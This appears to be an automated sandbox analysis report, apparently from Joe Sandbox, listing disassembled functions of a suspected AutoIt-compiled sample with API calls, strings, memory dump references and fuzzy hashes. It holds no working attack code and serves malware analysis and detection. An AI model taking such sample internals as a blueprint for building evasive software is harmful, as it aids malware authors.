                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: HeapInformationToken$AllocErrorLastProcess
                    • String ID:
                    • API String ID: 44706859-0
                    • Opcode ID: 5d4b9ec31aa8de7e9cceaf0f29e765d6a06d51787b357b5ca3da98e85298f33c
                    • Instruction ID: ab9e400f23ae58839e06bf833facd7e5aab3623e65254a8a0d1bcaf795f24f97
                    • Opcode Fuzzy Hash: 5d4b9ec31aa8de7e9cceaf0f29e765d6a06d51787b357b5ca3da98e85298f33c
                    • Instruction Fuzzy Hash: 1DF0C270201304AFEB111FA4EC88E677BBCEF8A754B144126F946C7151CB79DD00DA61
                    Function 007AC6A6 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
                    Download Yara Rule
                    APIs
                    • GetDlgItem.USER32(?,000003E9), ref: 007AC6BA
                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 007AC6D1
                    • MessageBeep.USER32(00000000), ref: 007AC6E9
                    • KillTimer.USER32(?,0000040A), ref: 007AC705
                    • EndDialog.USER32(?,00000001), ref: 007AC71F
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                    • String ID:
                    • API String ID: 3741023627-0
                    • Opcode ID: 4e2dd8d5db09acd9e1fbbd28aa094c28e2f48bb2476d983daeef0e1a58973bf8
                    • Instruction ID: 1274398bd774fa6ed33a5c5c30bd02029832c4f829c36b4c1eebc223936782e4
                    • Opcode Fuzzy Hash: 4e2dd8d5db09acd9e1fbbd28aa094c28e2f48bb2476d983daeef0e1a58973bf8
                    • Instruction Fuzzy Hash: 28018630501704ABEB229B20DD4EF9677B8FF01705F04466AF543A14E1DBF8A9548F94
                    Function 007513B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                    Download Yara Rule
                    APIs
                    • EndPath.GDI32(?), ref: 007513BF
                    • StrokeAndFillPath.GDI32(?,?,0078BAD8,00000000,?), ref: 007513DB
                    • SelectObject.GDI32(?,00000000), ref: 007513EE
                    • DeleteObject.GDI32 ref: 00751401
                    • StrokePath.GDI32(?), ref: 0075141C
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Path$ObjectStroke$DeleteFillSelect
                    • String ID:
                    • API String ID: 2625713937-0
                    • Opcode ID: a22053eedcad435fe555f748fadb6bfe91bef5e1a06028ddb46ec11ac837763c
                    • Instruction ID: 7da069c7e559202844fb980221850a0ef5f74407969f5a4d5037bc0a876ad11a
                    • Opcode Fuzzy Hash: a22053eedcad435fe555f748fadb6bfe91bef5e1a06028ddb46ec11ac837763c
                    • Instruction Fuzzy Hash: 95F0C930005248EBDB115F2AEC0C7983BB9BB01327F54C235E8AA894F1D77989A9DF54
                    Function 00762E5B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00770FF6: std::exception::exception.LIBCMT ref: 0077102C
                      • Part of subcall function 00770FF6: __CxxThrowException@8.LIBCMT ref: 00771041
                      • Part of subcall function 00757F41: _memmove.LIBCMT ref: 00757F82
                      • Part of subcall function 00757BB1: _memmove.LIBCMT ref: 00757C0B
                    • __swprintf.LIBCMT ref: 0076302D
                    Strings
                    • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00762EC6
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                    • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                    • API String ID: 1943609520-557222456
                    • Opcode ID: f9b1733a2e4ca9207cc606670dd9b8ddbd843c288fdc9ebcb0bcc1314b2c57ae
                    • Instruction ID: cee77dc52245df8a951c33cb649eee049c029290c655184a927d4477075a8b0e
                    • Opcode Fuzzy Hash: f9b1733a2e4ca9207cc606670dd9b8ddbd843c288fdc9ebcb0bcc1314b2c57ae
                    • Instruction Fuzzy Hash: 07919071508341DFCB18EF24E999CAEB7A9EF85740F00491DF846972A1DB78EE48CB52
                    Function 007AB7B6 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 241comCOMMON
                    Download Yara Rule
                    APIs
                    • OleSetContainedObject.OLE32(?,00000001), ref: 007AB981
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: ContainedObject
                    • String ID: AutoIt3GUI$Container$%~
                    • API String ID: 3565006973-1172083821
                    • Opcode ID: ee2366681e504fbe72f5135cffc9324f27f2068ea9e115cee531b2efdfa6359a
                    • Instruction ID: 424e89e8e5d540f711a4a718263982cc2cb262970c31f9f45cf7e3743f4d5973
                    • Opcode Fuzzy Hash: ee2366681e504fbe72f5135cffc9324f27f2068ea9e115cee531b2efdfa6359a
                    • Instruction Fuzzy Hash: D9914C71600201DFDB64DF68C884A6AB7F9FF89710F14856DF949DB2A2DB74E841CB50
                    Function 0077524D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                    Download Yara Rule
                    APIs
                    • __startOneArgErrorHandling.LIBCMT ref: 007752DD
                      • Part of subcall function 00780340: __87except.LIBCMT ref: 0078037B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: ErrorHandling__87except__start
                    • String ID: pow
                    • API String ID: 2905807303-2276729525
                    • Opcode ID: b35c5048295206ad2d3b81c1b182f56155c3c1b146d86e506d7f7283e7dbc9cc
                    • Instruction ID: f1f9bc96f9922446245bde2e2b25d3f8b12b60e944e84e7ca5bcd0d5a4796e94
                    • Opcode Fuzzy Hash: b35c5048295206ad2d3b81c1b182f56155c3c1b146d86e506d7f7283e7dbc9cc
                    • Instruction Fuzzy Hash: 0F517A61A89A41C7DF947724C94137A2B94AB013D0F20CD58E49D866F6EFBC8CD8DBC6
                    Function 0077023B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID:
                    • String ID: #$+
                    • API String ID: 0-2552117581
                    • Opcode ID: 00c6eb9c866c16234d15b2a0a073fa758a6c6be1ff2b1e131b843f3f7d8cee26
                    • Instruction ID: d14933629a63ba150fa1115b3e3bf7fcc42240a7335a2b226ba702bf2970cf3a
                    • Opcode Fuzzy Hash: 00c6eb9c866c16234d15b2a0a073fa758a6c6be1ff2b1e131b843f3f7d8cee26
                    • Instruction Fuzzy Hash: F0512375604646DFCF15DF28C888AFA7BA4EF96310F188155FC959B2A0D73C9C46CBA0
                    Function 00763297 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 161COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: _memmove$_free
                    • String ID: Oav
                    • API String ID: 2620147621-1091017984
                    • Opcode ID: 657eb094d883e8886e789dcc5d7d176ed6011b2fff132c77068c9b218df0ef32
                    • Instruction ID: 2115092af10062b167c9e9c675ed653636da52c0aff2eabddc21883810e9caf2
                    • Opcode Fuzzy Hash: 657eb094d883e8886e789dcc5d7d176ed6011b2fff132c77068c9b218df0ef32
                    • Instruction Fuzzy Hash: 7B5149716183419FDB28CF28C451B2BBBE1FF85314F44892DE98A87351EB39E901CB92
                    Function 007662F2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: _memset$_memmove
                    • String ID: ERCP
                    • API String ID: 2532777613-1384759551
                    • Opcode ID: b44df5f22380ab85fa0f0700959c9cb70d1591c7c08bd909e0c4ffc9b44535dc
                    • Instruction ID: d4f9b99598b7927dc6facd821c18ca17ae037f58172301a25405bc580ec7a88b
                    • Opcode Fuzzy Hash: b44df5f22380ab85fa0f0700959c9cb70d1591c7c08bd909e0c4ffc9b44535dc
                    • Instruction Fuzzy Hash: 2451C271900359DFDB24CF65C885BAABBF4FF44710F60856EEA4ACB241EB789684CB41
                    Function 007D7BB5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                    Download Yara Rule
                    APIs
                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,007DF910,00000000,?,?,?,?), ref: 007D7C4E
                    • GetWindowLongW.USER32 ref: 007D7C6B
                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 007D7C7B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Window$Long
                    • String ID: SysTreeView32
                    • API String ID: 847901565-1698111956
                    • Opcode ID: c7e55cbd6a8a657843da32079134ce1d461160bffebd5df77aea92cf724c902a
                    • Instruction ID: 9e4785eb384bff08fe91b9afb672897396f9529e8aebd581ab54159f52d1fb78
                    • Opcode Fuzzy Hash: c7e55cbd6a8a657843da32079134ce1d461160bffebd5df77aea92cf724c902a
                    • Instruction Fuzzy Hash: 3C319D31214205AEDB158F34CC45BEA7BB9EB05324F244726F879922E0E739E851DB60
                    Function 007D7648 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 007D76D0
                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 007D76E4
                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 007D7708
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: MessageSend$Window
                    • String ID: SysMonthCal32
                    • API String ID: 2326795674-1439706946
                    • Opcode ID: 92ba4da05dac3fac9c0a14111213faefabd7df14b37c6bde2e5cf5af05af87a7
                    • Instruction ID: 5298da26359d121f2123e188d024345ff63defb3dd582fcdb4e7a9e68ab885a3
                    • Opcode Fuzzy Hash: 92ba4da05dac3fac9c0a14111213faefabd7df14b37c6bde2e5cf5af05af87a7
                    • Instruction Fuzzy Hash: BB219132500219ABDF158E54CC46FEA3B79EF48724F110215FE156B2D0E6B9E850DBA0
                    Function 007D6F1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 007D6FAA
                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 007D6FBA
                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 007D6FDF
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: MessageSend$MoveWindow
                    • String ID: Listbox
                    • API String ID: 3315199576-2633736733
                    • Opcode ID: 78f3882e556fdf22f920527a326b2863738e4ebd5319fc40c641f95fd00ccc2c
                    • Instruction ID: ff88a553464d4c7dbc7d0a954099f50e8efaee0fc2125caf2ae0a9bb314728a7
                    • Opcode Fuzzy Hash: 78f3882e556fdf22f920527a326b2863738e4ebd5319fc40c641f95fd00ccc2c
                    • Instruction Fuzzy Hash: 68219232611118BFDF118F54DC85FEB37BAEF89764F018125F9159B290CA75AC518BA0
                    Function 007D797D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 007D79E1
                    • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 007D79F6
                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 007D7A03
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: MessageSend
                    • String ID: msctls_trackbar32
                    • API String ID: 3850602802-1010561917
                    • Opcode ID: d4d7e263e5b277207d8cdd9b2ab20fac06c6481dce8d7e3ec9a1337719f1104b
                    • Instruction ID: f03b2a935c6e0fdd74f331594ac4f9b2d6015331c0292b8c92d985282f31ae25
                    • Opcode Fuzzy Hash: d4d7e263e5b277207d8cdd9b2ab20fac06c6481dce8d7e3ec9a1337719f1104b
                    • Instruction Fuzzy Hash: 19110132240208BAEF149F64CC05FEB37B9EF89764F02461AFA41A61D0E275A811CB60
                    Function 00754C95 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00754C2E), ref: 00754CA3
                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00754CB5
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: GetNativeSystemInfo$kernel32.dll
                    • API String ID: 2574300362-192647395
                    • Opcode ID: 809736893b40b4e8be8544095975403ce19cb8c9118844299ca10b76235fef0a
                    • Instruction ID: 36668b9b2676f1cccad7ca896742404833973a4629a1891f1c2ca8a2ff72d83f
                    • Opcode Fuzzy Hash: 809736893b40b4e8be8544095975403ce19cb8c9118844299ca10b76235fef0a
                    • Instruction Fuzzy Hash: 8BD017B0512727CFD7209F31DA18A4676F6AF06796B15C83BD897D6250E7B8D8C0CA60
                    Function 00754D61 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00754D2E,?,00754F4F,?,008162F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00754D6F
                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00754D81
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                    • API String ID: 2574300362-3689287502
                    • Opcode ID: 7f30638b5fcd913f65abd8880d0a0fbe5b4f324662a7013167dab65bce9a44f6
                    • Instruction ID: 21d64c27b12581d715dde38f10ea1138e3a6647057782164c2c31e4d1a906146
                    • Opcode Fuzzy Hash: 7f30638b5fcd913f65abd8880d0a0fbe5b4f324662a7013167dab65bce9a44f6
                    • Instruction Fuzzy Hash: 74D08271A00B13CFE7208F30C80824272F8AF00352B10C83AD893C2290E6BCD8808A60
                    Function 00754D94 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00754CE1,?), ref: 00754DA2
                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00754DB4
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                    • API String ID: 2574300362-1355242751
                    • Opcode ID: f2fa2ad26d2a1dffec4d81c410250f902727418ee4305378705b7fa4fafaabc4
                    • Instruction ID: c98f3dd0c29209613b0c738a07357ce739e21b7e0fbfb0a59d8acb09b829550c
                    • Opcode Fuzzy Hash: f2fa2ad26d2a1dffec4d81c410250f902727418ee4305378705b7fa4fafaabc4
                    • Instruction Fuzzy Hash: EED01771A51B13DFD7209F31D808A8676F5AF0535AB15C83BD8D6D6290E7BCD8C0CA60
                    Function 007D1072 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • LoadLibraryA.KERNEL32(advapi32.dll,?,007D12C1), ref: 007D1080
                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 007D1092
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: RegDeleteKeyExW$advapi32.dll
                    • API String ID: 2574300362-4033151799
                    • Opcode ID: a0fc841c2835412b63d2450cf929686cf70b86c03a95259f40b993039e2b149e
                    • Instruction ID: 6f86e5e37ecbbbaa54ac6109a24184d61bb7b3818f0b343cc13128bc752b4adf
                    • Opcode Fuzzy Hash: a0fc841c2835412b63d2450cf929686cf70b86c03a95259f40b993039e2b149e
                    • Instruction Fuzzy Hash: F7D0E230511712EFD720AB75D819A1A76F4AF05761B19C82AE4AADA290E778C8808A50
                    Function 007C93F5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll,00000001,007C9009,?,007DF910), ref: 007C9403
                    • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 007C9415
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: GetModuleHandleExW$kernel32.dll
                    • API String ID: 2574300362-199464113
                    • Opcode ID: d16fe76e306b3fc23c2d1d90b5e1f9d5b96d9d942c05d65e8d8b16be84c221e8
                    • Instruction ID: cd9fffeaa4656e5a3391fda3fa9f8ec178ff5115156cd27b3f660ad853cc9c9b
